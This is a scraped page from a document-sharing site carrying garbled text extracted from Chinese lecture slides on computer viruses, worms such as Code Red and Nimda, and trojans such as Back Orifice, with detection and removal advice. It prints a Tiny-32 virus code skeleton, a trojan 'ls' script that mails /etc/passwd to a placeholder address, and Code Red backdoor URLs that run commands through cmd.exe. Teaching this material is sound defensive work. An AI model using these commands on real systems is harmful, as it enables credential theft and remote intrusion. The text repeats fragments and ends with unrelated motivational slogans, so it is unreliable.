计算机病毒蠕虫和特洛伊木马介绍课件_第1页
计算机病毒蠕虫和特洛伊木马介绍课件_第2页
计算机病毒蠕虫和特洛伊木马介绍课件_第3页
计算机病毒蠕虫和特洛伊木马介绍课件_第4页
计算机病毒蠕虫和特洛伊木马介绍课件_第5页
已阅读5页,还剩40页未读 继续免费阅读

下载本文档

版权说明:本文档由用户提供并上传,收益归属内容提供方,若内容存在侵权,请进行举报或认领

文档简介

计算机病毒、蠕虫和特洛伊木马计算机病毒、蠕虫和特洛伊木马1提纲计算机病毒网络蠕虫特洛伊木马提纲计算机病毒2计算机病毒病毒结构模型病毒的分类引导型病毒文件型病毒宏病毒病毒举例病毒防范计算机病毒病毒结构模型3计算机病毒的结构传染条件判断传染代码表现及破坏条件判断破坏代码传染模块表现模块计算机病毒的结构传染条件判断传染代码表现及破坏条件判断破坏代4计算机病毒的分类按攻击平台分类:DOS,Win32,MAC,Unix按危害分类:良性、恶性按代码形式:源码、中间代码、目标码按宿主分类:引导型主引导区操作系统引导区文件型操作系统应用程序宏病毒计算机病毒的分类按攻击平台分类:DOS,Win32,MAC,5引导型病毒—引导记录主引导记录(MBR)55AA主引导程序(446字节)分区1(16字节)主分区表(64字节)分区2(16字节)分区3(16字节)分区4(16字节)结束标记(2字节)引导代码及出错信息A引导型病毒—引导记录主引导记录(MBR)55AA主引导程序(6引导型病毒——系统引导过程PowerOnCPU&ROMBIOSInitializesPOSTTestsLookforbootdeviceMBRbootPartitionTableLoadDOSBootSectorRunsLoadsIO.SYSMSDOS.SYSDOSLoaded引导型病毒——系统引导过程PowerOnCPU&ROM7引导型病毒—感染与执行过程系统引导区引导正常执行病毒病毒执行病毒驻留带毒执行。。。。。病毒引导系统病毒体。。。引导型病毒—感染与执行过程系统引导区引导病毒病毒执行病毒驻留8病毒的激活过程空闲区。内存空间病毒进入int8int21int2Fint4A时钟中断处理DOS中断处理外设处理中断实时时种警报中断空闲区带病毒程序空闲区空闲区正常程序病毒int8int8。int8。int8int8int8int8int8int8int8int8int8int8。int8int8空闲区正常程序正常程序。正常程序正常程序int8是26日?是,破坏!int8病毒的激活过程空闲区。内存空间病毒进入int8int21in9……举例—小球病毒(BouncingBall)在磁盘上的存储位置文件分配表病毒的第二部分……000号扇区001号扇区第一个空簇FF7正常的引导扇区正常的引导扇区病毒的第一部分…举例—小球病毒(BouncingBall)在磁盘上的存储10感染后的系统启动过程启动将病毒程序的第一部分送入内存高端将第二部分装入内存,与第一部分拼接在一起读入真正的Boot区代码,送到0000:TC00处修改INT13中断向量,指向病毒转移到0000:TC00处,开始真正的系统引导感染后的系统启动过程启动将病毒程序的第一部分送入内存高端将第11触发条件--修改后的INT13进入INT13中断是否为读盘?执行正常的INT13程序执行正常的INT13程序N所读盘是否是自身?Y修改INT8开始发作Y是否整点或半点Y执行正常的INT13程序Y是否带病毒?N调用传染过程感染磁盘N不发作执行正常的INT13程序N触发条件--修改后的INT13进入INT13中断是否为读12病毒检测原理特征匹配例如,在香港病毒:1F58EA1AAF00F09C:POPAXJMPF000∶AF1APUSHF行为监控对中断向量表的修改对引导记录的修改对.exe,.com文件的写操作驻留内存软件模拟病毒检测原理特征匹配13防范与检测数据备份不要用移动介质启动(设置CMOS选项)设置CMOS的引导记录保护选项安装补丁,并及时更新安装防病毒软件,及时更新病毒定义码限制文件共享不轻易打开电子邮件的附件没有病毒处理前不要使用其他移动介质不要运行不可信的程序移动介质写保护防范与检测数据备份14文件型病毒—文件结构.COM文件 .EXE文件PSPHeader(256bytes)Code,Data,StackSegment(s)(64KBytes)代码、数据、堆栈在通一段中在内存中的.COM是磁盘文件的镜像PSPHeader(512bytes)CodeSegment(s)(64K)DataSegment(s)(64K)StackSegment(s)(64K)文件型病毒—文件结构.COM文件 .EXE文件PSP15其他可执行的文件类型.BAT.PIF.SYS.DRV.OVR.OVL.DLL.VxD其他可执行的文件类型.BAT16正常程序正常程序程序头正常程序程序头正常程序程序头正常程序程序头正常程序程序头正常程序程序头正常程序程序头正常程序程序头正常程序程序头正常程序程序头正常程序程序头正常程序程序头正常程序程序头正常程序程序头正常程序程序头正常程序程序头正常程序程序头正常程序程序头正常程序程序头正常程序程序头正常程序程序头正常程序程序头程序头程序头程序头程序头程序头程序头程序头程序头程序头程序头程序头程序头程序头程序头程序头程序头病毒程序头程序头病毒程序头程序头病毒程序头程序头病毒程序头程序头病毒程序头程序头病毒程序头程序头病毒程序头程序头病毒程序头程序头病毒程序头程序头病毒程序头程序头病毒程序头程序头病毒程序头程序头病毒程序程序头病毒程序程序头病毒程序程序头病毒程序程序头病毒程序程序头病毒程序病毒程序病毒程序病毒程序正常程序程序头程序头文件型病毒感染机理正常程序头程序头程序头程序头程序头程序头程序头程序头程序头程17文件型病毒举例最简单的病毒Tiny-32(32bytes)寻找宿主文件打开文件把自己写入文件关闭文件MOVAH,4E ;setuptofindafileINT21 ;findthehostfileMOVAX,3D02 ;setuptoopenthehostfileINT21 ;openhostfileMOVAH,40 ;setuptowritefiletodiskINT21 ;writetofileDB*.COM ;whatfilestolookfor文件型病毒举例最简单的病毒Tiny-32(32bytes)18宏病毒(MacroVirus)历史:1980年,Dr.FredrickCohenandRalfBurger论文1994年,MicrosoftWord第一例宏病毒Word,Excel,Access,PowerPoint,Project,LotusAmiPro,Visio,Lotus1-2-3,AutoCAD,CorelDraw.使用数据文件进行传播,使得反病毒软件不再只关注可执行文件和引导区DOEViRT统计,85%的病毒感染归因于宏病毒易于编写,只需要一两天的时间,10-15行代码大量的用户:90MillionMSOfficeUsers人们通常不交换程序,而交换数据宏病毒(MacroVirus)历史:19宏病毒工作机理有毒文件.docNormal.dot激活autoopen宏写入无毒文件.docNormal.dot启动激活病毒宏病毒工作机理有毒文件.docNormal.dot激活aut20注意事项Macro可以存在模板里,也可以存在文档里RTF文件也可以包含宏病毒通过IE浏览器可以直接打开,而不提示下载注意事项Macro可以存在模板里,也可以存在文档里21提纲计算机病毒网络蠕虫特洛伊木马提纲计算机病毒22蠕虫(Worm)一个独立的计算机程序,不需要宿主自我复制,自主传播(Mobile)占用系统或网络资源、破坏其他程序不伪装成其他程序,靠自主传播利用系统漏洞;利用电子邮件(无需用户参与)蠕虫(Worm)一个独立的计算机程序,不需要宿主23莫里斯蠕虫事件发生于1988年,当时导致大约6000台机器瘫痪主要的攻击方法Rsh,rexec:用户的缺省认证Sendmail的debug模式Fingerd的缓冲区溢出口令猜测莫里斯蠕虫事件发生于1988年,当时导致大约6000台机器瘫24CRI主要影响WindowsNT系统和Windows2000主要影响国外网络据CERT统计,至8月初已经感染超过25万台主要行为利用IIS的Index服务的缓冲区溢出缺陷进入系统检查c:\notworm文件是否存在以判断是否感染中文保护(是中文windows就不修改主页)攻击白宫!CRI主要影响WindowsNT系统和Windows225CRIIInspiredbyRCI影响波及全球国内影响尤其广泛主要行为所利用缺陷相同只感染windows2000系统,由于一些参数的问题,只会导致NT死机休眠与扫描:中文windows,600个线程CRIIInspiredbyRCI26Nimda简介影响系统:MSwin9x,wind2k,winXP传播途径:Email、文件共享、页面浏览、MSIIS目录遍历、CodeRed后门影响群发电子邮件,付病毒扫描共享文件夹,扫描有漏洞的IIS,扫描有CodeRed后门的IISServerNimda简介影响系统:MSwin9x,wind2k,27红色代码病毒红色代码病毒是一种结合了病毒、木马、DDOS机制的蠕虫。2001年7月中旬,在美国等地大规模蔓延。2001年8月初,出现变种coderedII,针对中文版windows系统,国内大规模蔓延。通过80端口传播。只存在与网络服务器的内存,不通过文件载体。利用IIS缓冲区溢出漏洞(2001年6月18日发布)红色代码病毒红色代码病毒是一种结合了病毒、木马、DDOS机制28CodeRedI在侵入一台服务器后,其运行步骤是:设置运行环境,修改堆栈指针,设置堆栈大小为218h字节。接着使用RVA(相对虚拟地址)查找GetProcAddress的函数地址,然后就获得其他socket、connect、send、recv、closesocket等函数地址;如果C:\notworm在,不再进一步传染;传染其他主机。创造100个线程,其中99个用户感染其他WEB服务器,被攻击IP通过一个算法计算得出;篡改主页,如果系统默认语言为“美国英语”,第100个进程就将这台服务的主页改成“Welcometo!,HackedByChinese!”,并持续10个小时。(这个修改直接在内存中修改,而不是修改*.htm文件);如果时间在20:00UTC和23:59UTC之间,将反复和白宫主页建立连接,并发送98k字节数据,形成DDOS攻击。CodeRedI在侵入一台服务器后,其运行步骤是:29CodeRedII增加了特洛依木马的功能,并针对中国网站做了改进计算IP的方法进行了修改,使病毒传染的更快;检查是否存在CodeRedII原子,若存在则进入睡眠状态防止反复感染,若不存在则创建CodeRedII原子;创建300个线程进行传染,若系统默认语言为简体中文或繁体中文,则创建600个线程;检查时间。病毒作者的意图是传播过程在2001年10月1日完成,之后,蠕虫会爆发而使系统不断重新启动。在系统中安装一个特洛依木马:拷贝系统目录cmd.exe到IIS的脚本执行目录下,改名为root.exe;将病毒体内的木马解压缩写到C盘和D盘的explorer.exe木马每次系统和启动都会运行,禁止系统的文件保护功能,并将C盘和D盘通过web服务器共享CodeRedII增加了特洛依木马的功能,并针对中国网站做30CodeRedII攻击形式http://x.x.x.x/c/inetpub/scripts/root.exe?/c+dirhttp://x.x.x.x/c/winnt/system32/cmd.exe?/c+dir其中x.x.x.x是被攻击的IP地址,dir可以是任意命令,比如删除系统中的文件,向外发送机密数据等,这个后门后来也成为了nimda病毒的一个传播模式。 下面是cert/cc上提供的被攻击服务器日志(CA-2001-11)2001-05-0612:20:190-080GET/scripts/../../winnt/system32/cmd.exe/c+dir200–2001-05-0612:20:190-080GET/scripts/../../winnt/system32/cmd.exe/c+dir+..\200–CodeRedII攻击形式31红色代码病毒的检测和防范针对安装IIS的windows系统;是否出现负载显著增加(CPU/网络)的现象;用netstat–an检查是否有许多对外的80端口连接在web日志中检查是否有/default.ida?xxx..%u0078%u0000%u00=aHTTP/1.0这样的攻击记录;查找系统中是否存在文件c:\explorer.exe或d:\explorer.exe以及root.exe;检查注册表文件中是否增加了C和D虚拟目录,以及文件保护功能是否被禁止。在任务管理器中检查是否存在两个explorer.exe进程。红色代码病毒的检测和防范针对安装IIS的windows系统;32提纲计算机病毒网络蠕虫特洛伊木马提纲计算机病毒33特洛伊木马名字来源:古希腊故事通过伪装成其他程序、有意隐藏自己恶意行为的程序,通常留下一个远程控制的后门没有自我复制的功能非自主传播用户主动发送给其他人放到网站上由用户下载特洛伊木马名字来源:古希腊故事34最简单的木马举例ls#!/bin/sh/bin/mailmyaddress@</etc/passwdlsPATH=./:/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin最简单的木马举例lsPATH=./:/usr/local/35特洛依木马举例BackOrificeCultoftheDeadCow在1998年8月发布,公开源码软件,遵守GPL,是功能强大的远程控制器木马。boserver.exe、boconfig.exe、bogui.exe在BO服务器上启动、停止基于文本的应用程序目录和文件操作。包括创建、删除、查看目录、查找、解压、压缩。共享。创建共享资源HTTP服务。启动或停止HTTP服务。击键记录。将BO服务器上用户的击键记录在一个文本文件中,同时记录执行输入的窗口名。(可以获得用户口令)特洛依木马举例BackOrifice36特洛依木马视频输入、播放。捕捉服务器屏幕到一个位图文件中。网络连接。列出和断开BO服务器上接入和接出的连接,可以发起新连接。查看信息。查看所有网络端口、域名、服务器和可见的共享“出口”。返回系统信息,包括机器名、当前用户、CPU类型、内存容量及可用内存、Windows版本、驱动器类型、硬盘容量及使用空间。端口重定向。注册表锁住或重启计算机。传输文件特洛依木马视频输入、播放。捕捉服务器屏幕到一个位图文件中。37特洛依木马使用netstat–a检查是否还有未知端口监听(默认31337)检测和删除注册表HLM\software\microsoft\windows\currentVersion\runservices键值,是否有“NameData.exe”,若有则删除C:\windows\system目录: 删除“.exe”文件和windll.dll文件特洛依木马使用netstat–a检查是否还有未知端口监听38特洛依木马其他木马国外subsever、dagger、ACKcmdC、DeepThroat、SatansBackdoor等国内(更常见)冰河、广外女生、netspy、黑洞等特洛依木马其他木马39删除木马的通用方法Win.ini文件 [windows]节中run=和load=system.ini文件 [boot]节的shell=explorer.exeAutoexec.bat文件 win命令注册表 HLM\software\microsoft\windows\currentversion\run HCU\software\microsoft\windows\currentversion\runonce HCR\exefile\shell\open\command“%1”%* HCU\controlpanel\desktop\wallpaper删除木马的通用方法Win.ini文件40更高级的木马技术服务器端程序文件的隐藏问题:磁盘上的文件、系统中的进程木马:DLL陷阱防范:DLL签名技术隐藏端口监听寄生:选择一个已经打开的端口,如80潜伏:不使用TCP/UDP,使用ICMP突破防火墙的限制反弹端口型木马:更高级的木马技术服务器端程序文件的隐藏41突破防火墙的限制:反弹端口型木马WebServer突破防火墙的限制:反弹端口型木马WebServer42病毒、蠕虫与木马的比较特性病毒蠕虫木马宿主需要不需要需要表现形式不以文件形式存在独立的文件伪装成其他文件传播方式依赖宿主文件或介质自主传播依靠用户主动传播主要危害破坏数据完整性、系统完整性侵占资源留下后门,窃取信息传播速度快极快慢病毒、蠕虫与木马的比较特性病毒蠕虫木马宿主需要不需要需要表现43提纲网络攻击方法窃听口令破解端口扫描和信息收集缓冲区溢出漏洞扫描拒绝服务恶意移动代码计算机病毒网络蠕虫特洛伊木马其他恶意代码提纲网络攻击方法44

1、用爱心来做事,用感恩的心做人。

2、人永远在追求快乐,永远在逃避痛苦。

3、有多大的思想,才有多大的能量。

4、人的能量=思想+行动速度的平方。

5、励志是给人快乐,激励是给人痛苦。

6、成功者绝不给自己软弱的借口。

7、你只有一定要,才一定会得到。

8、决心是成功的开始。

9、当你没有借口的那一刻,就是你成功的开始。

10、命运是可以改变的。

11、成功者绝不放弃。

12、成功永远属于马上行动的人。

13、下定决心一定要,才是成功的关键。

14、成功等于目标,其他都是这句话的注解。

15、成功是一个过程,并不是一个结果。

16、成功者学习别人的经验,一般人学习自己的经验。

17、只有第一名可以教你如何成为第一名。

18、学习需要有计划。

19、完全照成功者的方法来执行。

20、九十九次的理论不如一次的行动来得实际。

21、一个胜利者不会放弃,而一个放弃者永远不会胜利。

22、信心、毅力、勇气三者具备,则天下没有做不成的事。23、如果你想得到,你就会得到,你所需要付出的只是行动。

24、一个缺口的杯子,如果换一个角度看它,它仍然是圆的。

25、对于每一个不利条件,都会存在与之相对应的有利条件。

26、一个人的快乐,不是因为他拥有的多,而是他计较的少。

27、世间成事,不求其绝对圆满

温馨提示

  • 1. 本站所有资源如无特殊说明,都需要本地电脑安装OFFICE2007和PDF阅读器。图纸软件为CAD,CAXA,PROE,UG,SolidWorks等.压缩文件请下载最新的WinRAR软件解压。
  • 2. 本站的文档不包含任何第三方提供的附件图纸等,如果需要附件,请联系上传者。文件的所有权益归上传用户所有。
  • 3. 本站RAR压缩包中若带图纸,网页内容里面会有图纸预览,若没有图纸预览就没有图纸。
  • 4. 未经权益所有人同意不得将文件中的内容挪作商业或盈利用途。
  • 5. 人人文库网仅提供信息存储空间,仅对用户上传内容的表现方式做保护处理,对用户上传分享的文档内容本身不做任何修改或编辑,并不能对任何下载内容负责。
  • 6. 下载文件中如有侵权或不适当内容,请与我们联系,我们立即纠正。
  • 7. 本站不保证下载资源的准确性、安全性和完整性, 同时也不承担用户因使用这些下载资源对自己和他人造成任何形式的伤害或损失。

评论

0/150

提交评论